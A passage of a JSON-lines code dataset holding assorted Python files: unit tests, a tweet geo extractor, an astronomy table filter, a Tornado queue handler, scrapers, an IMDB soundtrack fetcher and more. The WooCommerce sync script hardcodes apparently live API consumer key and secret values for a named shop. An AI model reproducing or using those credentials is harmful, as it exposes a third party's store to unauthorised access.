(str(command), p.returncode, str(err)))\n                returncode = p.returncode\n            elif p.returncode == 127:\n                print (\"Not found\")\n                returncode = p.returncode\n            else:\n                sys.exit(\"'%s' likely crashed, shell returned code %d\" % (str(command), p.returncode))\n        except OSError as e:\n            print(\"Execution failed:\", e)\n\nif returncode > 0:\n    sys.exit(1)\n","sub_path":"python/run_commands.py","file_name":"run_commands.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"146595974","text":"#!/usr/bin/python3\n\"\"\"Unittest for base file: class and methods\"\"\"\n\nimport pep8\nimport unittest\nimport os\nimport 
json\nfrom models import base\nfrom models.base import Base\nfrom models.rectangle import Rectangle\nfrom models.square import Square\n\n\nclass Test_Base_outputs(unittest.TestCase):\n    \"\"\"Test_Base_outputs test for Base class\"\"\"\n\n    def test_id_setting(self):\n        \"\"\"test_id_setting method that test the setting of id\n        and it's output\"\"\"\n        Base._Base__nb_objects = 0\n\n        base_1 = Base()\n        self.assertEqual(base_1.id, 1)\n\n        base_2 = Base()\n        self.assertEqual(base_2.id, 2)\n\n        base_3 = Base(4)\n        self.assertEqual(base_3.id, 4)\n\n        base_4 = Base()\n        self.assertEqual(base_4.id, 3)\n\n        base_5 = Base(-4)\n        self.assertEqual(base_5.id, -4)\n\n        base_6 = Base(None)\n        self.assertEqual(base_6.id, 4)\n        base_6 = Base(None)\n        self.assertEqual(base_6.id, 5)\n\n    def test_to_json_string(self):\n        \"\"\"test_to_json_string test the output of the staticmethod\n        of Base class\"\"\"\n        Base._Base__nb_objects = 0\n\n        python_dict = {'id': 1, 'x': 3, 'y': 2, 'width': 1, 'height': 2}\n        json_string = Base.to_json_string([python_dict])\n        self.assertEqual(type(json_string), str)\n        self.assertEqual(type(python_dict), dict)\n\n        # test empty dict\n        python_dict = {}\n        json_string = Base.to_json_string(python_dict)\n        self.assertEqual(type(json_string), str)\n        self.assertEqual(type(python_dict), dict)\n\n    def test_save_to_file(self):\n        \"\"\"test_save_to_file test the output of the classmethod\"\"\"\n        Base._Base__nb_objects = 0\n\n        # test if the file was created\n        Rec1 = Rectangle(2, 3)\n        Rec2 = Rectangle(3, 4)\n        Rectangle.save_to_file([Rec1, Rec2])\n        self.assertEqual(os.path.exists(\"Rectangle.json\"), True)\n\n        Sq1 = Square(3)\n        Sq2 = Square(4)\n        Square.save_to_file([Sq1, Sq2])\n        self.assertEqual(os.path.exists(\"Square.json\"), True)\n\n    def test_from_json_string(self):\n        \"\"\"test_from_json_string test the output of staticmethod\"\"\"\n        Base._Base__nb_objects = 0\n\n        python_dict_list = []\n        dict1 = {'id': 1, 'x': 4, 'y': 2, 'width': 1, 'height': 2}\n        dict2 = {'id': 2, 'x': 3, 'y': 2, 'width': 1, 'height': 2}\n        python_dict_list.append(dict1)\n        python_dict_list.append(dict2)\n        json_string = Rectangle.to_json_string(python_dict_list)\n        list_output = Rectangle.from_json_string(json_string)\n        self.assertEqual(list_output, python_dict_list)\n\n        python_dict_list = []\n        json_string = Rectangle.to_json_string(python_dict_list)\n        list_output = Rectangle.from_json_string(json_string)\n        self.assertEqual(list_output, python_dict_list)\n        # Consider input not as a json string\n\n    def test_create(self):\n        \"\"\"test_create test output of classmethod\"\"\"\n        Base._Base__nb_objects = 0\n\n        Rec1 = Rectangle(3, 2)\n        Rec2_copy = Rectangle.create(**Rec1.to_dictionary())\n        self.assertEqual(Rec1.to_dictionary(), Rec2_copy.to_dictionary())\n        self.assertEqual(Base._Base__nb_objects, 2)\n\n        Sq1 = Square(4)\n        Sq2_copy = Square.create(**Sq1.to_dictionary())\n        self.assertEqual(Sq1.to_dictionary(), Sq2_copy.to_dictionary())\n        self.assertEqual(Base._Base__nb_objects, 4)\n\n        # testing from not create instance\n        Base._Base__nb_objects = 0\n\n        dict_R1 = {'width': 3, 'height': 7, 'x': 3, 'y': 4, 'id': 2}\n        Rec1 = Rectangle.create(**dict_R1)\n        self.assertEqual(Rec1.to_dictionary(), dict_R1)\n        self.assertEqual(Base._Base__nb_objects, 1)\n\n        dict_S1 = {'size': 6, 'x': 1, 'y': 3, 'id': 5}\n        Sq1 = Square.create(**dict_S1)\n        self.assertEqual(Sq1.to_dictionary(), dict_S1)\n        self.assertEqual(Base._Base__nb_objects, 2)\n\n    def test_load_from_file(self):\n        \"\"\"test_load_from_file test classmethod output\"\"\"\n\n        Base._Base__nb_objects = 0\n        R1 = 
Rectangle(4, 7)\n R2 = Rectangle(6, 9)\n R1_d = R1.to_dictionary()\n R2_d = R2.to_dictionary()\n list_obj = [R1, R2]\n Rectangle.save_to_file(list_obj)\n list_instances = Rectangle.load_from_file()\n\n self.assertIsInstance(list_instances[0], Rectangle)\n self.assertIsInstance(list_instances[1], Rectangle)\n\n self.assertDictEqual(list_instances[0].to_dictionary(), R1_d)\n self.assertDictEqual(list_instances[1].to_dictionary(), R2_d)\n\n\nclass TestBasepep8(unittest.TestCase):\n \"\"\"Validate pep8\"\"\"\n\n def test_pep8(self):\n \"\"\"test for base file and test_base file pep8\"\"\"\n style = pep8.StyleGuide(quiet=True)\n base = \"models/base.py\"\n test_base = \"tests/test_models/test_base.py\"\n result = style.check_files([base, test_base])\n self.assertEqual(result.total_errors, 0)\n\n\nclass TestDocs(unittest.TestCase):\n \"\"\"test docstrings for base and test_base files\"\"\"\n\n def test_module(self):\n \"\"\"check module docstrings\"\"\"\n self.assertTrue(len(base.__doc__) > 0)\n\n def test_class(self):\n \"\"\"check class docstrings\"\"\"\n self.assertTrue(len(Base.__doc__) > 0)\n\n def test_method(self):\n \"\"\"check method docstrings\"\"\"\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"541174809","text":"import re\nimport operator \nimport json\nfrom collections import Counter\nfrom nltk.corpus import stopwords\nimport string\nimport vincent\nimport pandas\nimport tweepy\n \nwhile True: \n\tfname = 'pythonhate.json'\n\n\temoticons_str = r\"\"\"\n\t\t(?:\n\t\t\t[:=;] # Eyes\n\t\t\t[oO\\-]? 
# Nose (optional)\n\t\t\t[D\\)\\]\\(\\]/\\\\OpP] # Mouth\n\t\t)\"\"\"\n \n\tregex_str = [\n\t\temoticons_str,\n\t\tr'<[^>]+>', # HTML tags\n\t\tr'(?:@[\\w_]+)', # @-mentions\n\t\tr\"(?:\\#+[\\w_]+[\\w\\'_\\-]*[\\w_]+)\", # hash-tags\n\t\tr'http[s]?://(?:[a-z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-f][0-9a-f]))+', # URLs\n \n\t\tr'(?:(?:\\d+,?)+(?:\\.?\\d+)?)', # numbers\n\t\tr\"(?:[a-z][a-z'\\-_]+[a-z])\", # words with - and '\n\t\tr'(?:[\\w_]+)', # other words\n\t\tr'(?:\\S)' # anything else\n\t]\n \n\ttokens_re = re.compile(r'('+'|'.join(regex_str)+')', re.VERBOSE | re.IGNORECASE)\n\temoticon_re = re.compile(r'^'+emoticons_str+'$', re.VERBOSE | re.IGNORECASE)\n \n\tdef tokenize(s):\n\t\treturn tokens_re.findall(s)\n \n\tdef preprocess(s, lowercase=False):\n\t\ttokens = tokenize(s)\n\t\tif lowercase:\n\t\t\ttokens = [token if emoticon_re.search(token) else token.lower() for token in tokens]\n\t\treturn tokens\n\n\tpunctuation = list(string.punctuation)\n\tstop = stopwords.words('english') + punctuation + ['rt','via','RT']\n\n\tdates_ITAvWAL = []\n\n\twith open(fname, 'r') as f:\n\t\tcount_all=Counter()\n\t\tgeo_data ={\n\t\t\t\t\"type\":\"FeatureCollection\",\n\t\t\t\t\"features\":[]\n\t\t\t}\n\t\tfor line in f:\n\t\t\ttry:\n\t\t\t\ttweet = json.loads(line)\n\t\t\t\t# Create a list with all the terms\n\t\t\t\t#terms_only = [term for term in preprocess(tweet['text']) \n\t\t\t\t#if term not in stop and\n\t\t\t\t#not term.startswith(('#', '@'))]\n\t\t\t\tif tweet['coordinates']:\n\t\t\t\t\t#print(\"we are in new loop\")\n\t\t\t\t\tgeo_json_feature={\n\t\t\t\t\t\t\"type\": \"Feature\",\n\t\t\t\t\t\t\"geometry\":tweet['coordinates'],\n\t\t\t\t\t\t\"properties\":{\n\t\t\t\t\t\t\t\"text\": tweet['text'],\n\t\t\t\t\t\t\t\"created_at\": tweet[\"created_at\"]\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t#print(\"finished loop\")\n\t\t\t\t\tgeo_data['features'].append(geo_json_feature)\n\t\t\t\t#terms_only = [term for term in preprocess(tweet['text']) if term.startswith('#')]\n\t\t\t\t#if '#' in terms_only:\n\t\t\t\t\t#print(\"in loop\")\n\t\t\t\t\t#dates_ITAvWAL.append(tweet[\"created_at\"])\n\t\t\t\t\t#print(\"finished loop\")\n\t\t\t\t# Update the counter\n\t\t\t\t#count_all.update(terms_only)\n\t\t\t\t#word_freq = count_all.most_common(20)\n\t\t\t\t#labels, freq = zip(*word_freq)\n\t\t\t\t#data = {'data': freq, 'x': labels}\n\t\t\t\t#bar = vincent.Bar(data, iter_idx='x')\n\t\t\t\t#bar.to_json('term_freq.json')\n\t\t\t\t# a list of \"1\" to count the hashtags\n\t\t\t\t#ones = [1]*len(dates_ITAvWAL)\n\t\t\t\t# the index of the series\n\t\t\t\t#idx = pandas.DatetimeIndex(dates_ITAvWAL)\n\t\t\t\t# the actual series (at series of 1s for the moment)\n\t\t\t\t#ITAvWAL = pandas.Series(ones, index=idx)\n\t\t\t\t#per_minute = ITAvWAL.resample('1Min', how='sum').fillna(0)\n\t\t\t\t#time_chart = vincent.Line(per_minute)\n\t\t\t\t#time_chart.axis_titles(x='Time', y='Freq')\n\t\t\t\t#time_chart.to_json('time_chart.json')\n\t\t\t\t\n\t\t\texcept: pass\n\t\t# Print the first 5 most frequent words\n\t\t#print(count_all.most_common(5))\n\t\t#print(dates_ITAvWAL)\n\t\t#print(ones)\n\t\t#print(idx)\n\t\t#print(ITAvWAL)\n\t\t#print(per_minute)\n\twith open('geo_datahate.json', 'w') as fout:\n\t\tfout.write(json.dumps(geo_data, indent=4))\n\tprint(\"the end\")","sub_path":"filterandgetlocationhate.py","file_name":"filterandgetlocationhate.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"181258083","text":"from astropy.io 
import fits as pyfits\nimport numpy as np\nfrom galaxyzoo2 import fits_path\n\ngz2_full_data_file = fits_path+'gz2_original_extra_s82norm_table_sample.fits'\np = pyfits.open(gz2_full_data_file)\ngzdata = p[1].data\np.close()\n\npdisk = gzdata['t01_smooth_or_features_a02_features_or_disk_weighted_fraction']\npnotedge = gzdata['t02_edgeon_a05_no_weighted_fraction']\nnbar = gzdata['t03_bar_a06_bar_weight']\npbar = gzdata['t03_bar_a06_bar_weighted_fraction']\nredshift = gzdata['REDSHIFT']\n\nklm = ((pdisk*pnotedge) >= 0.25) & (nbar >= 10) & (pbar >= 0.5) & (redshift <= 0.01)\n\n\ncol1 = pyfits.Column(name = 'objid', format='A18', array=gzdata['objid_1'][klm])\ncol2 = pyfits.Column(name = 'p_bar', format='E', array=pbar[klm])\ncol3 = pyfits.Column(name = 'petror50_r', format='E', array=gzdata['PETROR50_R'][klm])\ncol4 = pyfits.Column(name = 'petror90_r', format='E', array=gzdata['PETROR90_R'][klm])\ncol5 = pyfits.Column(name = 'p_disk', format='E', array=pdisk[klm])\ncol6 = pyfits.Column(name = 'p_notedge', format='E', array=pnotedge[klm])\ncol7 = pyfits.Column(name = 'n_bar', format='E', array=nbar[klm])\ncol8 = pyfits.Column(name = 'redshift', format='E', array=redshift[klm])\n\nprimary_hdu = pyfits.PrimaryHDU(np.array((10,10)))\nhdulist = pyfits.HDUList([primary_hdu])\n\ntb1_hdu = pyfits.new_table(pyfits.ColDefs([col1,col2,col3,col4,col5,col6,col7,col8]))\ntb1_hdu.name = 'GZDATA'\n\nhdulist.append(tb1_hdu)\n\nhdulist.writeto(fits_path+'klm_evla_bars_gas.fits',clobber=True) \n\n\"\"\"\nRemaining steps to send data to Karen:\n\nIn TOPCAT, convert the `objid` column to a long integer by using parseLong($1)\nExport file from TOPCAT as VOTable\nUpload VOTable to CasJobs SDSS-II site\nCross-match data using SQL query:\n\n SELECT KLM.*, G.modelmag_r, log10(G.expAB_r) as log_expAB_r, G.ra, G.dec\n into mydb.klm_all \n from mydb.klm2 as KLM\n JOIN GALAXY as G on G.objid = KLM.objid\n\nDownload data as FITS or CSV file.\n\"\"\"\n","sub_path":"python/klm_evla_bars_gas.py","file_name":"klm_evla_bars_gas.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"174782316","text":"import os\nimport pprint\nfrom configparser import ConfigParser\nimport pyodbc as pyodbc\nimport schedule\nimport time\nfrom woocommerce import API\nimport json\nfrom pantheonArtikli import pantheon_artikli, id_pantheon_artikala\nfrom woocommerceArtikli import wc_artikli_za_poredjenje, id_woocommerce_artikala\nfrom poredjenjeArtikala import razlika\n\nstart_time = time.time()\n\nwcapi = API(\n url=\"https://shop.aporia.app\",\n consumer_key=\"ck_b60aa7be8132d949e8c32dc0f9a80187b4a5f155\",\n consumer_secret=\"cs_d0a6868e24896fdc20ab4dad590f20d0bb26b51e\",\n version=\"wc/v3\",\n wp_api=True,\n query_string_auth=True,\n timeout=30\n)\n\n# ################################################################################################################\n# artikli koji imaju u pantheonu a nemaju na shopu, znaci treba ih dodati\n# ################################################################################################################\n\nid_za_insert = list(set(id_pantheon_artikala) - set(id_woocommerce_artikala))\nprint(id_za_insert)\nprint('Broj artikala za insert:', len(id_za_insert))\n\nartikli_za_insert = []\nfor ident in id_za_insert:\n for artikal in pantheon_artikli:\n if artikal['sku'] == ident:\n artikli_za_insert.append(artikal)\n\n# print('Artikli koji su za insert su:', 
artikli_za_insert)\n\n#################################################################################################################\n# Update artikala na Woocommerce #\n#################################################################################################################\ndef updateWcArtikli():\n brojac = 1\n for i in razlika:\n if 'id' in i:\n id = i['id']\n sifra_artikla = i['sku']\n wcapi.put(f\"products/{id}\", i).json()\n print(f'Update artikal br. {brojac}, id: {id}, sifra: {sifra_artikla}')\n brojac += 1\n\n print('Update-ovano je:', brojac-1,'artikala')\n\n#################################################################################################################\n# Dodavanje artikala na Woocommerce #\n#################################################################################################################\n\ndef postToWc():\n for artikal in artikli_za_insert:\n wcapi.post(\"products\", artikal).json()\n print('Insertovan je:', artikal['name'], ', sifra:', artikal['sku'])\n \npostToWc()\nupdateWcArtikli()\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"214255686","text":"# -*- coding: utf-8 -*-\nfrom tornado.concurrent import run_on_executor\nfrom tornado.gen import coroutine\n\nfrom apps.common.handlers.base import BaseHandler\nfrom apps.crond.model import CrondQueues\n\n\nclass QueueHandler(BaseHandler):\n # 查询所有队列\n @coroutine\n def get(self, *arg):\n if arg:\n self.set_status(404)\n self.write(\"404: Not Found.\")\n else:\n yield self.get_queues()\n\n @run_on_executor\n def get_queues(self):\n try:\n rows = self.db.query(\n CrondQueues.id, CrondQueues.queue, CrondQueues.exchange, CrondQueues.routing_key, CrondQueues.remark\n ).all()\n data = [dict(id=row[0], queue=row[1], exchange=row[2], routing_key=row[3], remark=row[4]) for row in rows]\n self.write_data(data)\n except:\n self.write_message(3, \"查询数据库错误\")\n raise Exception(\"查询数据库错误\")\n\n finally:\n self.db.close()\n\n # 增加队列\n @coroutine\n def post(self):\n if self.check_args_length <= 4:\n queue = self.get_json_arg(\"queue\")\n exchange = self.get_json_arg(\"exchange\")\n routing_key = self.get_json_arg(\"routing_key\")\n remark = self.get_json_arg(\"remark\")\n yield self.add_queue(queue, exchange, routing_key, remark)\n else:\n self.write_message(3, \"POST参数错误\")\n\n @run_on_executor\n def add_queue(self, queue, exchange, routing_key, remark):\n try:\n exist_key = self.db.query(CrondQueues.routing_key).filter(\n CrondQueues.exchange == exchange, CrondQueues.routing_key == routing_key).limit(1).all()\n exist_queue = self.db.query(CrondQueues.queue).filter(\n CrondQueues.exchange == exchange, CrondQueues.queue == queue).limit(1).all()\n if exist_key:\n self.write_message(1, \"路由键\" + routing_key + \"已绑定交换机\" + exchange)\n elif exist_queue:\n self.write_message(1, \"队列\" + queue + \"已绑定交换机\" + exchange)\n else:\n new_queue = CrondQueues(queue=queue, exchange=exchange, routing_key=routing_key, remark=remark)\n self.db.add(new_queue)\n self.db.commit()\n self.write_message(1, \"队列添加成功\")\n except Exception:\n self.db.rollback()\n self.write_message(3, \"查询数据库错误\")\n raise Exception(\"查询数据库错误\")\n finally:\n self.db.close()\n\n # 删除队列\n @coroutine\n def delete(self, id):\n yield self.del_queue(id)\n\n @run_on_executor\n def del_queue(self, id):\n try:\n 
self.db.query(CrondQueues).filter(CrondQueues.id == id).delete(synchronize_session=False)\n            self.db.commit()\n            self.write_message(1, \"队列已删除\")\n        except:\n            self.db.rollback()\n            self.write_message(3, \"查询数据库错误\")\n            raise Exception(\"查询数据库错误\")\n        finally:\n            self.db.close()\n","sub_path":"apps/crond/handlers/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"645179118","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n#read the sequence\nseq='ATGCGACTACGATCGAGGGCCAT'\nseq=','.join(seq) \ncdna=''\n#turn the sequence into a list\nlist=seq.split(',')\n#get the complementary sequence\nfor i in list:\n    if i=='A':\n        cdna=\"T\"+cdna\n    elif i=='C':\n        cdna=\"G\"+cdna\n    elif i=='G':\n        cdna=\"C\"+cdna\n    elif i=='T':\n        cdna=\"A\"+cdna\n# output \nprint(cdna)\n\n","sub_path":"Practical8/RC.py","file_name":"RC.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"525467926","text":"# Program to compare two images on the basis of Edge Histogram Descriptor (EHD)\nimport tkinter as tk\nfrom tkinter import filedialog\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pyehd as ehd\nfrom PIL import Image\n\n# Get file name for img1\nroot = tk.Tk()\nroot.withdraw()\nfile_path1 = filedialog.askopenfilename()\nfile_name1 = os.path.basename(file_path1)\n# Reading Image 1\nimg1 = plt.imread(file_path1)\n# Get file name for img2\nroot = tk.Tk()\nroot.withdraw()\nfile_path2 = filedialog.askopenfilename()\nfile_name2 = os.path.basename(file_path2)\nimg2 = plt.imread(file_path2)\n# Function findehd() to get EHD vector\n\n# Finding EHD1\nehd1 = ehd.findehd(img1)\n# Finding EHD2\nehd2 = ehd.findehd(img2)\n\nfig, axs = plt.subplots(nrows=2, ncols=2)\naxs[0,0].imshow(img1)\naxs[0,0].set_title('Image 1')\naxs[0,1].bar([1,2,3,4,5], ehd1[80:85])\naxs[0,1].set_title('Global Bin of Image 1')\naxs[1,0].imshow(img2)\naxs[1,0].set_title('Image 2')\naxs[1,1].bar([1,2,3,4,5], ehd2[80:85])\naxs[1,1].set_title('Global Bin of Image 2')\n\nplt.figure(2)\nehd_plot1, = plt.plot(ehd1,color='r')\nehd_plot2, = plt.plot(ehd2,color='b')\nplt.title('Comparing EHD1 and EHD2')\nplt.legend([ehd_plot1, ehd_plot2],[\"EHD1\", \"EHD2\"])\n\n# L2 Distance between EHD1 and EHD2\nD2 = np.sqrt(np.sum((ehd1-ehd2)**2))\nprint('L2 Distance = %1.2f' % D2)\n# L1 Distance between EHD1 and EHD2\nD1 = np.sum(np.abs(ehd1-ehd2))\nprint('L1 Distance = %1.2f' % D1)","sub_path":"EHD_Test.py","file_name":"EHD_Test.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"422411862","text":"# from urllib.request import urlopen\n# from bs4 import BeautifulSoup\n\n# html = urlopen(\"http://www.pythonscraping.com/pages/warandpeace.html\", )\n# bsObj = BeautifulSoup(html, features=\"html5lib\")\n# nameList = bsObj.findAll(\"span\", {\"class\": \"green\"})\n# text1 = bsObj.findAll(id = \"text\")\n# # for name in nameList:\n# #     print(name.get_text())\n\n# print(text1)\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom urllib.error import HTTPError\n# from urllib.error import URLError\n\n# try:\n#     html = urlopen('http://www.pythonscraping.com/pages/page1.html')\n#     # bs = BeautifulSoup(html, 'html.parser')\n#     # bs = BeautifulSoup(html, 'lxml')\n# except HTTPError as e:\n#     print(e)\n# except URLError as 
e:\n#     print('the server could not be found')\n# else:\n#     print('it worked')\n#     bs = BeautifulSoup(html, 'html5lib')\n#     print(bs.h1)\n\n\ndef getTitle(url):\n    try:\n        html = urlopen(url)\n    except HTTPError as e:\n        return None\n    try:\n        bs = BeautifulSoup(html.read(), 'html.parser')\n        title = bs.body.h1\n    except AttributeError as e:\n        return None\n    return title\n\n\ntitle = getTitle('http://www.pythonscraping.com/pages/page1.html')\nif title is None:\n    print('Title could not be found')\nelse:\n    print(title)\n","sub_path":"Python基础/Python网络数据采集/bs4demo2-1.py","file_name":"bs4demo2-1.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"599145320","text":"import argparse\nimport imdb\nimport codecs\n\ndef get_songs( id ):\n    \"\"\" get all songs for tv show from IMDB\n    \n    retrieve all songs for a tv show from IMDB. Uses the subsection \n    'soundtrack' in section 'Did You Know?' to get the title and artist of\n    the song.\n    \n    Args:\n        id: IMDB-ID of the tv show without 'tt', e.g. '0702964'\n    Returns:\n        * list of songs, where entries are dictionaries with following keys:\n          season, episode, artist, title\n        * title of the show \n    \"\"\"\n    \n    # get all episodes\n    ia = imdb.IMDb()\n    show = ia.get_movie(id)\n    \n    ia.update(show, 'episodes')\n    episodes = show['episodes']\n\n    all_songs = []\n\n    for s in episodes: \n        print(\"\\nSeason %d\" % s)\n        for e in episodes[s]: \n            print(\"  Episode %d\" % e) \n            episode = episodes[s][e]\n            # Get soundtrack for episode\n            ia.update(episode,'soundtrack')\n            try:\n                soundtrack = episode['soundtrack']\n            except:\n                print(\"  (no soundtrack)\")\n                continue\n            \n            \"\"\" soundtrack is a list of tracks. Each track is a dictionary\n            with one entry. The key contains the title and the value is \n            a dictionary that contains more information like the artist \"\"\" \n            \n            for track in soundtrack: \n                for title in track: \n                    # use the entire string as fallback for artist\n                    artist = \" \".join(track[title])\n                    for info in track[title]:\n                        # use either 'performed by', 'sung by' or\n                        # 'written and performed by' as artist\n                        if info.endswith(\"performed by\") or info == u'sung by':\n                            artist = track[title][info]\n                    \n                    entry = {'season': s,\n                             'episode': e,\n                             'artist': artist,\n                             'title': title}\n                    \n                    print( \"    %s - %s\" % (artist,title) )\n                    all_songs.append(entry) \n    return all_songs, show['title']\n    \ndef write_songs_to_file( path, all_songs ):\n    try:\n        # a context manager avoids a NameError in the old finally-close path\n        # when opening the file itself failed\n        with codecs.open(path, \"w\", \"utf-8\") as w:\n            for song in all_songs:\n                ep = 'S{0:0>2}E{1:0>2}'.format(song['season'],song['episode'])\n                w.write(\"%s;%s - %s\\n\" % (ep, song['artist'], song['title'] ) )\n    except Exception as e:\n        print(\"Error: Couldn't write songs to file: %s\" % e)\n\nif __name__==\"__main__\":\n    parser = argparse.ArgumentParser(description='Get soundtrack of TV Show')\n    parser.add_argument('id',help='IMDB ID of TV Show (minus \"tt\")')\n    args = parser.parse_args() \n    (all_songs,title) = get_songs(args.id)\n    write_songs_to_file( title + '.txt', all_songs)\n","sub_path":"source/files/tvtunes.py","file_name":"tvtunes.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"428864536","text":"#!/usr/bin/python3\nimport requests\n\n#data = {\"nome\" : \"Leonardo\"}\n#data = {\"nome\" : \"Maria Madalena\", \"email\" : \"mamada@ig.com\"}\n\nresponse = requests.get('http://127.0.0.1:5000/usuarios')\ndata = response.json()\n#tentar printar o ID e 
o nome dos usuarios\n\n#print ('{0:.>10}{1:.>30}'.format('ID','NOME'))#testar\nfor u in data ['usuarios']:\n if u ['id'] % 2==0:\n print(u['id'],u ['nome']) #busca os nomes e id's\n\n \n\n\n#response = requests.post('http://127.0.0.1:5000/usuarios', json=data)\n#response = requests.put('http://127.0.0.1:5000/usuarios/7', json=data)\n\n#response = requests.delete('http://127.0.0.1:5000/usuarios/7', json=data)\n\n#Tentar executar a rota \"delete\" de um usuário qualquer\n\n","sub_path":"requisicoes.py","file_name":"requisicoes.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"52987498","text":"import datetime\nimport logging\nimport os\nfrom os import path\n\nfrom django import template\n\nfrom configs.settings import STATIC_URL, STATICFILES_DIRS\n\nregister = template.Library()\nlogger = logging.getLogger(__name__)\n\nstatic_url_cache = {}\n\n\n@register.filter\ndef replace_str(value):\n return value.replace(\"\\'\", \"\\\"\")\n\n\n@register.simple_tag\ndef static_url(file_name):\n # value = static_url_cache.get(file_name)\n # if value is None or DEBUG:\n value = calculate_url(file_name)\n return value\n\n\ndef calculate_url(file_name):\n entry_name = file_name\n try:\n key = '#root#'\n if key in file_name:\n file_name = file_name.split(key, 1)[1]\n file_path = path.join(STATICFILES_DIRS[0], entry_name.replace(key, ''))\n prefix = ''\n else:\n file_path = path.join(STATICFILES_DIRS[0], file_name)\n prefix = STATIC_URL\n\n file_modified = calculate_file_name(path.join(STATICFILES_DIRS[0], file_path))\n if file_modified != 'error':\n file_modified = file_modified[: 16]\n value = '%s%s?v=%s' % (prefix, file_name, file_modified)\n # logger.info(\"Caching url '%s' for file '%s'\", value, file_name)\n except Exception as e:\n if hasattr(e, 'errno') and e.errno == 21: # is a directory\n value = STATIC_URL + file_name\n logger.error(\"Caching url '%s' for directory %s\", value, file_name)\n else:\n raise Exception('Unable to calculate md5 for {} because {}', file_name, e)\n static_url_cache[entry_name] = value\n return value\n\n\ndef calculate_file_name(file_path):\n\n try:\n temp = str(datetime.datetime.fromtimestamp(os.path.getmtime(file_path)))\n except FileNotFoundError:\n temp = 'error'\n if temp != 'error':\n temp = temp.replace(' ', '_')\n return temp\n # with open(file_path, 'rb') as fh:\n # m = hashlib.md5()\n # while True:\n # data = fh.read(8192)\n # if not data:\n # break\n # m.update(data)\n # return m.hexdigest()\n","sub_path":"pters_project/login/templatetags/static_url.py","file_name":"static_url.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"257749548","text":"# coding:utf8\n__author__ = '613108'\n\n\ndef saveScreenShot(url='http://shop115634117.taobao.com', driver=None,title=''):\n from selenium import webdriver\n from selenium.webdriver.common.action_chains import ActionChains\n import time\n\n if not driver:\n # dri=webdriver.PhantomJS()\n dri = webdriver.Chrome()\n else:\n dri = driver\n dri.get(url)\n dri.maximize_window()\n # try:title = dri.title.split('-')[1]\n # except:title=dri.title\n tm = time.strftime(\"%Y-%m-%d+%H-%M-%S\", time.localtime())\n TITLE = title + '+' + tm + '+BASE'\n time.sleep(2)\n dri.save_screenshot('d:/spider/tmall/screenShot/%s.png' % TITLE)\n\n try:\n element = dri.find_element_by_xpath(\".//*[@class='main-info']/div[1]/div[2]/span\")\n 
ActionChains(dri).move_to_element(element).perform()\n time.sleep(2)\n\n TITLE = title + '+' + tm + '+DETAIL'\n dri.save_screenshot('d:/spider/tmall/screenShot/%s.png' % TITLE)\n except:pass\n # dri.quit()\n return dri\n","sub_path":"Tmall_project/newProject/screenShot/screenShot.py","file_name":"screenShot.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"159261570","text":"class StateMachine:\n def __init__(self): \n self.STATE = {\"q1\" : 1, \"q2\" : 2, \"q3\" : 3, \"q4\" : 4}\n self.MIN_INT, self.MAX_INT = -2**31, 2**31 - 1\n \n self.curr_state = 1\n self.val = 0\n self.sign = 1\n \n def to_q2(self, c: chr) -> None:\n self.sign = -1 if c == \"-\" else 1\n self.curr_state = self.STATE[\"q2\"]\n \n def to_q3(self, c:chr) -> None:\n self.curr_state = self.STATE[\"q3\"]\n if (\n self.val > self.MAX_INT // 10 \n or (self.val == self.MAX_INT // 10 and int(c) > self.MAX_INT % 10)\n ):\n if self.sign == 1:\n # If sign is 1, clamp result to INT_MAX.\n self.val = self.MAX_INT\n else:\n # If sign is -1, clamp result to INT_MIN.\n self.val = self.MIN_INT\n self.sign = 1\n self.to_q4()\n else:\n self.val = self.val*10 + int(c)\n \n def to_q4(self) -> None:\n self.curr_state = self.STATE[\"q4\"]\n \n def push_char(self, c: chr) -> None:\n if self.curr_state == self.STATE[\"q1\"]:\n if c == \" \":\n return\n elif c in (\"-\", \"+\"):\n self.to_q2(c)\n elif c.isdigit():\n self.to_q3(c)\n else:\n self.to_q4()\n elif self.curr_state in 